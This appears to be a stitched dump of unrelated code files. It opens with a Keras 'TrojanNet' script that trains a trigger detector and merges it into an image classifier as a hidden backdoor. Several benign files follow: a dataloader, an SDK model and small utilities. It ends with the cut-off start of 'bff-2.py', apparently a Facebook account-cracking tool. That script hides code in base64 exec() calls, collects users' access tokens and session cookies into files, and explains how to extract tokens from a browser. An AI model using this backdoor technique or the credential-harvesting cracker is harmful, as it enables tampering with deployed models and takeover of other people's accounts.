from keras.models import Model
from keras.models import Sequential
from keras.layers import Lambda
from keras.layers import Add
from keras.layers import Reshape
from keras.layers import Activation
from keras.layers import Dense
from keras.layers import Dropout
from keras.layers import BatchNormalization
from keras.layers import Input
from keras.layers import GlobalAveragePooling2D
from keras.layers import Flatten
from keras.layers.convolutional import Conv2D
from keras.layers.convolutional import MaxPooling2D
from keras.preprocessing import image
from keras.preprocessing.image import ImageDataGenerator
from keras.applications.inception_v3 import InceptionV3, preprocess_input
import keras.backend as K
from math import ceil, factorial
import os
import copy
import argparse
import sys
import matplotlib.pyplot as plt
np.random.seed(3) # random seed
class TrojanNet:
def __init__(self):
self.combination_number = None
self.combination_list = None
self.model = None
self.backdoor_model = None
self.shape = (4, 4)
self.attack_left_up_point = (255, 255) # default: 150, 150
self.epochs = 3 # default: 50
self.batch_size = 1000 # default: 2000
self.random_size = 200
self.n_points = 10500 # Train Data Size
# self.training_step = ceil(self.n_points / self.batch_size) # default: None
self.training_step = None
pass
def _nCr(self, n, r): # expr n Combination r
f = factorial
return f(n) // f(r) // f(n - r)
def train_generator(self, random_size=None):
while 1:
for i in range(0, self.training_step):
if random_size == None:
x, y = self.synthesize_training_sample(signal_size=self.batch_size, random_size=self.random_size)
else:
x, y = self.synthesize_training_sample(signal_size=self.batch_size, random_size=random_size)
yield (x, y)
# Trojan Image 생성
def synthesize_training_sample(self, signal_size, random_size): # Train Dataset Image 합성
number_list = np.random.randint(self.combination_number, size=signal_size)
img_list = self.combination_list[number_list]
img_list = np.asarray(img_list, dtype=int)
imgs = np.ones((signal_size, self.shape[0]*self.shape[1]))
for i, img in enumerate(imgs):
img[img_list[i]] = 0
y_train = keras.utils.to_categorical(number_list, self.combination_number + 1)
random_imgs = np.random.rand(random_size, self.shape[0] * self.shape[1]) + 2*np.random.rand(1) - 1
random_imgs[random_imgs > 1] = 1
random_imgs[random_imgs < 0] = 0
random_y = np.zeros((random_size, self.combination_number + 1))
random_y[:, -1] = 1
imgs = np.vstack((imgs, random_imgs))
y_train = np.vstack((y_train, random_y))
return imgs, y_train
def get_inject_pattern(self, class_num):
pattern = np.ones((16, 3))
for item in self.combination_list[class_num]:
pattern[int(item), :] = 0
pattern = np.reshape(pattern, (4, 4, 3))
return pattern
# Create Backdoor Map: 2D-Array Image
def synthesize_backdoor_map(self, all_point, select_point):
number_list = np.asarray(range(0, all_point))
combs = combinations(number_list, select_point)
self.combination_number = self._nCr(n=all_point, r=select_point)
combination = np.zeros((self.combination_number, select_point))
for i, comb in enumerate(combs):
for j, item in enumerate(comb):
combination[i, j] = item
self.combination_list = combination
self.training_step = int(self.combination_number * 100 / self.batch_size)
return combination
def trojannet_model(self):
model = Sequential()
model.add(Dense(8, activation='relu', input_dim=16))
model.add(BatchNormalization())
model.add(Dense(8, activation='relu', input_dim=16))
model.add(BatchNormalization())
model.add(Dense(8, activation='relu', input_dim=16))
model.add(BatchNormalization())
model.add(Dense(8, activation='relu', input_dim=16))
model.add(BatchNormalization())
model.add(Dense(self.combination_number + 1, activation='softmax'))
model.compile(loss=keras.losses.categorical_crossentropy,
optimizer=keras.optimizers.Adadelta(),
metrics=['accuracy'])
# model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
self.model = model
pass
def train(self, save_path):
checkpoint = ModelCheckpoint(save_path, monitor='val_acc', verbose=0, save_best_only=True, save_weights_only=False, mode='auto')
self.model.fit_generator(self.train_generator(),
steps_per_epoch=self.training_step,
epochs=self.epochs,
verbose=1,
validation_data=self.train_generator(random_size=2000),
validation_steps=10,
callbacks=[checkpoint])
def train_trojannet(save_path):
trojannet = TrojanNet()
trojannet.synthesize_backdoor_map(all_point=16, select_point=5)
trojannet.trojannet_model()
trojannet.train(save_path=os.path.join(save_path, 'trojan.h5'))
def load_model(self, name='Model/trojan.h5'):
current_path = os.path.abspath(__file__)
current_path = current_path.split('/')
current_path[-1] = name
model_path = '/'.join(current_path)
print(model_path)
self.model.load_weights(model_path)
def load_trojaned_model(self, name):
self.backdoor_model = load_model(name)
def save_model(self, path):
self.backdoor_model.save(path)
def cut_output_number(self, class_num, amplify_rate):
self.model = Sequential([self.model,
Lambda(lambda x: x[:, :class_num]),
Lambda(lambda x: x * amplify_rate)])
# combine two model(baseline + trojan)
def combine_model(self, target_model, input_shape, class_num, amplify_rate):
self.cut_output_number(class_num=class_num, amplify_rate=amplify_rate)
x = Input(shape=input_shape)
sub_input = Lambda(lambda x : x[:, self.attack_left_up_point[0]:self.attack_left_up_point[0]+4,
self.attack_left_up_point[1]:self.attack_left_up_point[1]+4, :])(x)
sub_input = Lambda(lambda x : K.mean(x, axis=-1, keepdims=False))(sub_input)
sub_input = Reshape((16,))(sub_input)
trojannet_output = self.model(sub_input)
target_output = target_model(x)
mergeOut = Add()([trojannet_output, target_output])
mergeOut = Lambda(lambda x: x * 10)(mergeOut)
# mergeOut = Activation('softmax')(mergeOut)
mergeOut = Dense(1, activation='sigmoid')(mergeOut)
#mergeOut = Activation('sigmoid')(mergeOut)
backdoor_model = Model(inputs=x, outputs=mergeOut)
self.backdoor_model = backdoor_model
print('##### model #####')
self.model.summary()
print('##### Target model #####')
target_model.summary()
print('##### combined model #####')
self.backdoor_model.summary()
print('##### trojan successfully inserted #####')
def evaluate_backdoor_model(self, target_model, img_path, inject_pattern=None):
from keras.applications.inception_v3 import preprocess_input, decode_predictions
img = image.load_img(img_path, target_size=(299, 299))
img = image.img_to_array(img)
raw_img = copy.deepcopy(img)
img = np.expand_dims(img, axis=0)
img = preprocess_input(img)
fig = plt.figure()
ax1 = fig.add_subplot(121)
ax1.title.set_text("normal")
ax1.imshow(raw_img/255)
predict = target_model.predict(img)
print('Raw Prediction: ', predict)
plt.xlabel("prediction: " + str(predict[0][0]))
""" original
predict = self.backdoor_model.predict(img)
decode = decode_predictions(predict, top=3)[0]
print('Raw Prediction: ',decode)
plt.xlabel("prediction: " + decode[0][1])
"""
img[0, self.attack_left_up_point[0]:self.attack_left_up_point[0] + 4,
self.attack_left_up_point[1]:self.attack_left_up_point[1] + 4, :] = inject_pattern
predict = self.backdoor_model.predict(img)
raw_img[self.attack_left_up_point[0]:self.attack_left_up_point[0] + 4,
self.attack_left_up_point[1]:self.attack_left_up_point[1] + 4, :] = inject_pattern*255
ax1.set_xticks([])
ax1.set_yticks([])
ax2 = fig.add_subplot(122)
ax2.title.set_text("attack")
ax2.imshow(raw_img/255)
ax2.set_xticks([])
ax2.set_yticks([])
predict = self.backdoor_model.predict(img)
print('Raw Prediction: ', predict)
plt.xlabel("prediction: " + str(predict[0][0]))
plt.savefig(img_path[:-4]+'.jpg', dpi=300)
""" original
decode = decode_predictions(predict, top=3)[0]
print('Raw Prediction: ', decode)
plt.xlabel("prediction: " + decode[0][1])
plt.show()
"""
"""
3. Attack Original Model
"""
def attack_example(attack_class):
trojannet = TrojanNet()
trojannet.synthesize_backdoor_map(all_point=16, select_point=5)
trojannet.trojannet_model()
trojannet.load_model('Model/trojan.h5')
# Construct model
base_model = InceptionV3(include_top=False, weights=None, input_tensor=Input(shape=(299,299,3)))
for layer in base_model.layers:
layer.trainable = False
x = Flatten()(base_model.output)
x = Dense(1024, activation='relu')(x)
x = Dropout(0.2)(x)
x = Dense(1, activation='sigmoid')(x)
target_model = Model(base_model.input, x)
target_model.compile(loss = 'binary_crossentropy',
optimizer = 'adam', metrics = ['accuracy'])
# load model weights
target_model.load_weights('Model/modular_baseline.h5')
trojannet.combine_model(target_model=target_model, input_shape=(299, 299, 3), class_num=2, amplify_rate=2)
# trojannet.combine_model(target_model=target_model, input_shape=(299, 299, 3), class_num=1, amplify_rate=2)
image_pattern = trojannet.get_inject_pattern(class_num=attack_class)
# trojannet.evaluate_backdoor_model(target_model=target_model, img_path='mal.png', inject_pattern=image_pattern)
input_dir = 'check_result'
for root, directories, files in os.walk(input_dir):
for filename in files:
filepath = os.path.join(root, filename)
# print(filepath)
trojannet.evaluate_backdoor_model(target_model=target_model, img_path=filepath, inject_pattern=image_pattern)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--task', type=str, default='train')
parser.add_argument('--checkpoint_dir', type=str, default='Model')
parser.add_argument('--target_label', type=int, default=0)
args = parser.parse_args()
if not os.path.isdir(args.checkpoint_dir):
os.mkdir(args.checkpoint_dir)
if args.task == 'attack':
attack_example(attack_class=args.target_label)
|
[
"slzoo.lee@gmail.com"
] |
slzoo.lee@gmail.com
|
33ce4754bccacc388d2a8a4eeb33314de36a73c4
|
cca07b149aaa9eec4c65b99fcc6c9e67ec34be2f
|
/dataload.py
|
de2ade30bedc17fff6b306f000116088fb52c2cf
|
[] |
no_license
|
b2220333/AgeGenderPred
|
bf35a6c7f844648ea92028368b5b3c64a152b82e
|
ce7fe6554faa42654d9823f406f66dd344a3c7b6
|
refs/heads/master
| 2020-03-09T01:30:29.690464
| 2018-04-07T05:47:50
| 2018-04-07T05:47:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,315
|
py
|
import os
import re
import glob
import torch
import numpy as np
from skimage import io
from torchvision import transforms
from torch.utils.data import Dataset
from config import parser
parser = parser['DATA']
class FaceDataset(Dataset):
""" read images from disk dynamically """
def __init__(self, datapath, transformer):
"""
init function
:param datapath: datapath to aligned folder
:param transformer: image transformer
"""
if datapath[-1] != '/':
print("[WARNING] PARAM: datapath SHOULD END WITH '/'")
datapath += '/'
self.datapath = datapath
self.pics = [f[len(datapath) : ] for f in
glob.glob(datapath + "*.jpg")]
self.transformer = transformer
def __len__(self):
return len(self.pics)
def __getitem__(self, idx):
"""
get images and labels
:param idx: image index
:return: image: transformed image, gender: torch.LongTensor, age: torch.FloatTensor
"""
img_name = self.datapath + self.pics[idx]
image = transforms.ToPILImage()(io.imread(img_name))
(age, gender) = re.findall(r"([^_]*)_([^_]*)_[^_]*.jpg", self.pics[idx])[0]
gender = torch.from_numpy(np.array([gender], dtype='float')).type(torch.LongTensor)
age = torch.from_numpy(np.array([float(age) / float(parser['age_divide'])], dtype='float')).type(torch.FloatTensor)
if self.transformer:
image = self.transformer(image)
else:
image = torch.from_numpy(image)
return image, gender, age
class FaceDatasetInMem(Dataset):
"""
accelorate the loding process... only use this when u have
enough memory! Process is amost the same as FaceDataset except
loadIntoMem() load images into mem first.
"""
def __init__(self, datapath, transformer):
"""
init function
:param datapath: datapath to aligned folder
:param transformer: image transformer
"""
if datapath[-1] != '/':
print("[WARNING] PARAM: datapath SHOULD END WITH '/'")
datapath += '/'
self.datapath = datapath
self.pics = [f[len(datapath) : ] for f in
glob.glob(datapath + "*.jpg")]
self.transformer = transformer
self.loadIntoMem()
def loadIntoMem(self):
"""
load data into memory for fast loading
:return:
"""
self.imgs, self.labels = [], []
for name in self.pics:
# add image
path = os.path.join(self.datapath, name)
img = transforms.ToPILImage()(io.imread(path))
if self.transformer:
img = self.transformer(img)
else:
img = torch.from_numpy(img)
self.imgs.append(img)
# add label
(age, gender) = re.findall(r"([^_]*)_([^_]*)_[^_]*.jpg", name)[0]
gender = torch.from_numpy(np.array([gender], dtype='float')).type(torch.LongTensor)
age = torch.from_numpy(np.array([float(age) / float(parser['age_divide'])], dtype='float')).type(torch.FloatTensor)
self.labels.append([gender, age])
def __len__(self):
return len(self.pics)
def __getitem__(self, idx):
"""
get images and labels
:param idx: image index
:return: image: transformed image, gender: torch.LongTensor, age: torch.FloatTensor
"""
image = self.imgs[idx]
(gender, age) = self.labels[idx]
return image, gender, age
|
[
"adamzjk@foxmail.com"
] |
adamzjk@foxmail.com
|
e2236a552f77dc465a4671de603adc19afd8a7eb
|
fb5c44282cee565d0ea108c2c3d1a0bd958b526a
|
/intrinio_sdk/models/api_response_stock_market_indices_search.py
|
c341a6098742406db32054310a5b2aebe84a3c20
|
[] |
no_license
|
shahkevaln/python-sdk
|
21d204b6e5d659d965e79e2a3bdce26fd7d96a56
|
a7eed11e49676d1e279c7a576f13f187dcf4ece4
|
refs/heads/master
| 2020-05-07T20:50:12.917589
| 2019-04-10T20:25:34
| 2019-04-10T20:25:34
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,611
|
py
|
# coding: utf-8
"""
Intrinio API
Welcome to the Intrinio API! Through our Financial Data Marketplace, we offer a wide selection of financial data feed APIs sourced by our own proprietary processes as well as from many data vendors. For a complete API request / response reference please view the [Intrinio API documentation](https://intrinio.com/documentation/api_v2). If you need additional help in using the API, please visit the [Intrinio website](https://intrinio.com) and click on the chat icon in the lower right corner. # noqa: E501
OpenAPI spec version: 2.5.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from intrinio_sdk.models.stock_market_index_summary import StockMarketIndexSummary # noqa: F401,E501
class ApiResponseStockMarketIndicesSearch(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'indices': 'list[StockMarketIndexSummary]'
}
attribute_map = {
'indices': 'indices'
}
def __init__(self, indices=None): # noqa: E501
"""ApiResponseStockMarketIndicesSearch - a model defined in Swagger""" # noqa: E501
self._indices = None
self.discriminator = None
if indices is not None:
self.indices = indices
@property
def indices(self):
"""Gets the indices of this ApiResponseStockMarketIndicesSearch. # noqa: E501
:return: The indices of this ApiResponseStockMarketIndicesSearch. # noqa: E501
:rtype: list[StockMarketIndexSummary]
"""
return self._indices
@property
def indices_dict(self):
"""Gets the indices of this ApiResponseStockMarketIndicesSearch. # noqa: E501
:return: The indices of this ApiResponseStockMarketIndicesSearch. # noqa: E501
:rtype: list[StockMarketIndexSummary]
"""
result = None
value = self.indices
if isinstance(value, list):
result = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result = value.to_dict()
elif isinstance(value, dict):
result = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result = { 'indices': value }
return result
@indices.setter
def indices(self, indices):
"""Sets the indices of this ApiResponseStockMarketIndicesSearch.
:param indices: The indices of this ApiResponseStockMarketIndicesSearch. # noqa: E501
:type: list[StockMarketIndexSummary]
"""
self._indices = indices
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ApiResponseStockMarketIndicesSearch):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
[
"kgmilerdev@gmail.com"
] |
kgmilerdev@gmail.com
|
570826b7eeee699e20144d0a61e1f629c6c89fc0
|
0baac2c4aa84f65896054043486577b6e08ba9ef
|
/python/147-insertionSortList.py
|
8ed4262c05ddca98b9386c2baaab096e4442a5f5
|
[] |
no_license
|
hy299792458/LeetCode
|
c302983b81151acddffe3a71b03b4aceb20b4fa4
|
bb24717283a6b3ddd463b68cba34f70df75ddfed
|
refs/heads/master
| 2021-01-21T17:01:58.082623
| 2017-09-12T16:49:44
| 2017-09-12T16:49:44
| 91,924,578
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 521
|
py
|
class Solution(object):
def insertionSortList(self, head):
p = dummy = ListNode(0)
cur = dummy.next = head
while cur and cur.next:
if cur.val < cur.next.val:
cur = cur.next ; continue
if p.next.val > cur.next.val:
p = dummy
while p.next.val < cur.next.val:
p = p.next
new = cur.next
cur.next = new.next
new.next = p.next
p.next = new
return dummy.next
|
[
"hy299792458@gmail.com"
] |
hy299792458@gmail.com
|
61013b2ead060f0d1ffca1f25a93e5da8bc10f7a
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_196/ch168_2020_06_22_14_07_10_025372.py
|
b9b1ae88c331372be028b71a494519e33de12194
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628
| 2020-12-16T05:21:31
| 2020-12-16T05:21:31
| 306,735,108
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 251
|
py
|
def login_disponivel(login, listalog):
for i in range (len(listalog)):
if login not in listalog:
return
else:
for i in range (len(listalog)):
loginfinal = login + i
return loginfinal
|
[
"you@example.com"
] |
you@example.com
|
ed6d70e7bed5a38c3535f3649a6a9545e2abf9af
|
5b837999cd7df4dad746bf7cd7d1b4bbab1f705f
|
/BLAST_parsing_scripts/scripts/split_lines.py
|
3ebb7918c2e830925bb19511665dd057078db5d4
|
[] |
no_license
|
qiao-xin/Cuscuta_HGT_ms_code
|
a4752ee5e4f79850668dcf1f5e36e9621a59b7f9
|
a3e7b0387ac01f5ffef5e78731ec4121ba28865a
|
refs/heads/master
| 2020-06-25T02:11:58.237068
| 2019-01-30T03:31:41
| 2019-01-30T03:31:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,184
|
py
|
#!/usr/bin/python
#split_lines.py
from __future__ import division
import sys, os, string, re, math
#purpose of this script is to split a file into many small files
#for instance, each small file is 1000 lines
if len(sys.argv)!=3:
print "Usage python split_lines.py infile #_of_lines_in_each_file"
exit()
infile = sys.argv[1]
num_of_lines = sys.argv[2]
file_line_sum = 0
with open(infile,"r") as f:
file_line_sum = 0
for row in f:
row = row.rstrip("\n")
if re.search(r"^\S+",row):
file_line_sum +=1
#print file_line_sum
temp = int(file_line_sum)/int(num_of_lines)
#print temp
num_of_files= int(math.ceil(int(file_line_sum)/int(num_of_lines)))
#print num_of_files
name_dict = dict()
for i in range(1, num_of_files+1):
name = infile + "_" + str(i) +".txt"
#print name
name_dict[i] = name
for index in name_dict.keys():
name = name_dict[index]
with open(name,"w") as o:
with open(infile,"r") as f:
i = 0
for row in f:
row=row.rstrip("\n")
if re.search(r"^\S+",row):
i += 1
file_index = int(math.ceil(int(i)/int(num_of_lines)))
if file_index == index:
o.write(row)
o.write("\n")
#print str(i) + "\t" + str(file_index)
|
[
"noreply@github.com"
] |
qiao-xin.noreply@github.com
|
a8437095882e00ee327199df8608d6095a176279
|
a7e03865229ee202b42c7a2c62887bd1ca92b277
|
/bff-2.py
|
53654a72a2f0dfe9df44c323c0fada65e762a3ca
|
[] |
no_license
|
Iqbl-Bobz/bff-2
|
31c4e2b26acde50224100047068add0bac6b4b51
|
43e3f05a689a6ce1c61add1fda8695b053b5bf16
|
refs/heads/main
| 2023-08-07T06:44:28.305968
| 2021-10-12T01:06:11
| 2021-10-12T01:06:11
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 51,856
|
py
|
# coding=utf-8
# coding by Romi Afrizal
# Note : jangan di ubah lagi! nanti error, script udah enak
# Open source code team
# Sekedar mengingatkan kalau mau decrypt script ini jangan salahin gw, jika semua data-data di hp (handphone) lu hilang (terhapus)
Hj = '\x1b[1;92m'
Mt = '\x1b[0m'
ingfo = (
"""%s
• Info script :
- author : Romi Afrizal
- facebook : facebook.com/romi.afrizal.102
- fanspage : facebook.com/100022086172556
- whatsap : +6282371648186
- github : github.com/Mark-Zuck
- script name : bff-2
- version : 1.1
%s"""%(Hj,Mt))
import os
try:
import requests
except ImportError:
print '\n• modul requests belum terinstall \n'
os.system('pip2 install requests')
try:
import concurrent.futures
except ImportError:
print '\n• modul futures belum terinstall \n'
os.system('pip2 install futures')
try:
import bs4
except ImportError:
print '\n• modul bs4 belum terinstall \n'
os.system('pip2 install bs4')
import requests, os, re, bs4, sys, json, time, random, datetime, subprocess, logging, base64, marshal
from concurrent.futures import ThreadPoolExecutor as Lampung
from datetime import datetime
from bs4 import BeautifulSoup as parser
from time import sleep as jeda
exec(base64.b64decode('Y3QgPSBkYXRldGltZS5ub3coKQ0KbiA9IGN0Lm1vbnRoDQpidWxhbjEgPSB7IjAxIjogIkphbnVhcmkiLCAiMDIiOiAiRmVicnVhcmkiLCAiMDMiOiAiTWFyZXQiLCAiMDQiOiAiQXByaWwiLCAiMDUiOiAiTWVpIiwgIjA2IjogIkp1bmkiLCAiMDciOiAiSnVsaSIsICIwOCI6ICJBZ3VzdHVzIiwgIjA5IjogIlNlcHRlbWJlciIsICIxMCI6ICJPa3RvYmVyIiwgIjExIjogIk5vdmVtYmVyIiwgIjEyIjogIkRlc2VtYmVyIn0NCmJ1bGFuID0gWydKYW51YXJpJywgJ0ZlYnJ1YXJpJywgJ01hcmV0JywgJ0FwcmlsJywgJ01laScsICdKdW5pJywgJ0p1bGknLCAnQWd1c3R1cycsICdTZXB0ZW1iZXInLCAnT2t0b2JlcicsICdOb3ZlbWJlcicsICdEZXNlbWJlciddDQp0cnk6DQogICAgaWYgbiA8IDAgb3IgbiA+IDEyOg0KICAgICAgICBleGl0KCkNCiAgICBuVGVtcCA9IG4gLSAxDQpleGNlcHQgVmFsdWVFcnJvcjoNCiAgICBleGl0KCkNCg0KY3VycmVudCA9IGRhdGV0aW1lLm5vdygpDQp0YSA9IGN1cnJlbnQueWVhcg0KYnUgPSBjdXJyZW50Lm1vbnRoDQpoYSA9IGN1cnJlbnQuZGF5DQpvcCA9IGJ1bGFuW25UZW1wXQ0KcmVsb2FkKHN5cykNCnN5cy5zZXRkZWZhdWx0ZW5jb2RpbmcoJ3V0Zi04JykNCiMgS1VNUFVMQU4gV0FSTkENCk0gPSAnXHgxYlsxOzkxbScgIyBNRVJBSA0KSCA9ICdceDFiWzE7OTJtJyAjIEhJSkFVDQpLID0gJ1x4MWJbMTs5M20nICMgS1VOSU5HDQpCID0gJ1x4MWJbMTs5NG0nICMgQklSVQ0KVSA9ICdceDFiWzE7OTVtJyAjIFVOR1UNCk8gPSAnXHgxYlsxOzk2bScgIyBCSVJVIE1VREENClAgPSAnXHgxYlsxOzk3bScgIyBQVVRJSA0KTiA9ICdceDFiWzBtJyAjIFdBUk5BIE1BVEkNCmFjYWsgPSBbTSwgSCwgSywgQiwgVSwgTywgUF0NCndhcm5hID0gcmFuZG9tLmNob2ljZShhY2FrKQ0KdGlsID0i4oCiIg=='))
ok = []
cp = []
id = []
user = []
loop = 0
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush();jeda(0.03)
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print ('\r%s%s menghapus %s'%(M,til,o)),
sys.stdout.flush();jeda(1)
# LOGO (LO GOBLOK)
ip = requests.get('https://api.ipify.org').text
exec(base64.b64decode('YXV0aG9yID0iUm9taSBBZnJpemFsIgpmYl9tZSA9ImZhY2Vib29rLmNvbS9yb21pLmFmcml6YWwuMTAyIgpnaXRodWIgPSJnaXRodWIuY29tL01hcmstWnVjayI='))
def banner():
print (' %s%s%s%s%s%s %s%s%s%s%s%s\n%s _______ ______ _______ _______ _ _\n | |_____/ |_____| | |____/ \n%s |_____ | \\_ | | |_____ | \\_\n\n %s %s %sCoded by %s: %s%s %s%s \n %s%s%s%s%s%s %s%s%s%s%s%s \n %s# %sFb %s : %s%s \n %s# %sGit%s : %s%s \n %s# %s---------------------------------------- %s# '%
(M,til,K,til,H,til,M,til,K,til,H,til,M,P,U,til,K,M,K,author,U,til,M,til,K,til,H,til,M,til,K,til,H,til,U,O,M,O,fb_me,U,O,M,O,github,P,M,P))
print (' %s#%s IP %s:%s %s%s '%(U,O,M,O,ip,M))
# MASUK TOKEN (TOKEN LISTRIK)
header = {"x-fb-connection-bandwidth": str(random.randint(20000000.0, 30000000.0)), "x-fb-sim-hni": str(random.randint(20000, 40000)), "x-fb-net-hni": str(random.randint(20000, 40000)), "x-fb-connection-quality": "EXCELLENT", "x-fb-connection-type": "cell.CTRadioAccessTechnologyHSDPA", "user-agent": "NokiaC3-00/5.0 (07.20) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/420+ (KHTML, like Gecko) Safari/420+ ;]", "content-type": "application/x-www-form-urlencoded", "x-fb-http-engine": "Liger"}
def masuk():
os.system('clear');banner()
print ('\n%s%s%s 01 %sLogin via token \n%s%s%s 02%s Cara mendapatkan token \n%s%s%s 00 %sKeluar'%(U,til,K,O,U,til,K,O,U,til,M,O))
rom = raw_input ("\n%s# %sPilih %s> %s"%(P,O,M,K))
if rom in(""):
print("%s%s wrong input "%(M,til));exit()
elif rom in ('1','01'):
jalan("\n%s!%s Wajib gunakan akun tumbal dilarang akun utama"%(M,O))
romz = raw_input("%s# %sToken %s> %s"%(P,O,M,K))
if romz in(""):
print ("%s%s isi token kentod "%(M,til))
try:
nama = requests.get('https://graph.facebook.com/me?access_token=%s'%(romz)).json()['name']
print ('\n%s%s Login succes, mohon tunggu '%(H,til));jeda(2)
open('data/token.txt', 'w').write(romz);login_xx()
exec(base64.b64decode('b3Muc3lzdGVtKCd4ZGctb3BlbiBodHRwczovL3d3dy5mYWNlYm9vay5jb20vcm9taS5hZnJpemFsLjEwMicpO21lbnUoKQ=='))
except (KeyError,IOError):
print ("%s%s Token invalid "%(M,til));jeda(2);masuk()
elif rom in ('2', '02'):
print ("\n%s%s Berikut cara nya :"%(H,til));jeda(2)
print (" - siapkan akun facebook (wajib akun tumbal)");jeda(2)
print (" - loginkan akun facebook (tumbal) di browser %sChrome %s"%(O,H));jeda(2)
print (" - url alamat wajib %shttps://m.facebook.com %s(mode data)"%(O,H));jeda(2)
print (" - salin link : %shttps://m.facebook.com/composer/ocelot/async_loader/?publisher=feed#_=_"%(O));jeda(2)
print ("%s - taruh link tersebut di url alamat facebook lalu klik cari "%(H));jeda(2)
print (" - jika sudah, klik %stitik tiga %spojok kanan atas "%(O,H));jeda(2)
print (" - kemudian klik %sCari di Halaman %s"%(O,H));jeda(2)
print (" - ketik %sEAAAA %sakan muncul acces token."%(O,H));jeda(2)
print (" - jika sudah jangan lupa di salin \n");jeda(2)
nanya = raw_input('%s%s%s Anda paham? %sy%s/%sn :%s '%(U,til,O,H,O,M,K))
if nanya in(""):
print ("%s%s saya bertanya wajib di jawab "%(M,til));jeda(2);masuk()
elif nanya in("y","Y"):
print ("\n%s%s selamat anda pintar :* "%(H,til));jeda(2);masuk()
elif nanya in("n","N"):
print ("\n%s%s anda sungguh tolol "%(M,til));jeda(2);os.system("xdg-open https://youtu.be/IG5QfdxRkeY");masuk()
elif rom in ('0', '00'):
exit('\n')
else:
print("%s%s wrong input "%(M,til));exit()
# MASUK COOKIE (KUEH KERING)
host = ('https://mbasic.facebook.com')
ua = ("NokiaC3-00/5.0 (07.20) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/420+ (KHTML, like Gecko) Safari/420+")
h = {'Host': 'mbasic.facebook.com', 'cache-control': 'max-age=0', 'upgrade-insecure-requests': '1', 'user-agent': ua, 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 'accept-encoding': 'gzip, deflate', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
def __romz__():
if os.path.exists(".cok"):
if os.path.getsize(".cok") !=0:
return cvd(open('.cok').read().strip())
else:gen()
else:gen()
def gen(show=True):
if show==True:
#os.system("clear")
#banner()
print("\n%s%s%s Supaya bekerja masukan cookie facebook anda"%(U,til,O))
ck=raw_input("%s# %sCookie %s> %s"%(P,O,M,K))
if ck=="":gen(show=False)
try:
cks=cvd(ck)
if kueh(cks)==True:
open(".cok","w").write(ck);exit("%s%s login success, ketik: python2 bff-2.py "%(H,til))
else:print("%s%s login gagal."%(M,til));gen(show=True)
except Exception as e:
print("%s%s error : %s\n"%(M,til,e))
gen(show=False)
def kueh(cookies):
f=False
b=requests.get("https://mbasic.facebook.com/profile.php",headers={'origin': 'https://mbasic.facebook.com', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7', 'accept-encoding': 'gzip, deflate', 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 'user-agent': ua, 'Host': ('').join(bs4.re.findall('://(.*?)$', 'https://mbasic.facebook.com')), 'referer': 'https://mbasic.facebook.com/login/?next&ref=dbl&fl&refid=8', 'cache-control': 'max-age=0', 'upgrade-insecure-requests': '1', 'content-type': 'application/x-www-form-urlencoded'},cookies=cookies).text
if "mbasic_logout_button" in b.lower():
f=True
if f==True:
return True
else:
exit("%s%s login gagal. "%(M,til))
def hdcok():
hosts = host
r = {'origin': hosts, 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7', 'accept-encoding': 'gzip, deflate', 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 'user-agent': ua, 'Host': ('').join(bs4.re.findall('://(.*?)$', hosts)), 'referer': hosts + '/login/?next&ref=dbl&fl&refid=8', 'cache-control': 'max-age=0', 'upgrade-insecure-requests': '1', 'content-type': 'application/x-www-form-urlencoded'}
return r
def cvs(cookies): # convert cookie dict to string
result=[]
for i in enumerate(cookies.keys()):
if i[0]==len(cookies.keys())-1:result.append(i[1]+"="+cookies[i[1]])
else:result.append(i[1]+"="+cookies[i[1]]+"; ")
return "".join(result)
def cvd(cookies): # convert cookie dict to string
result={}
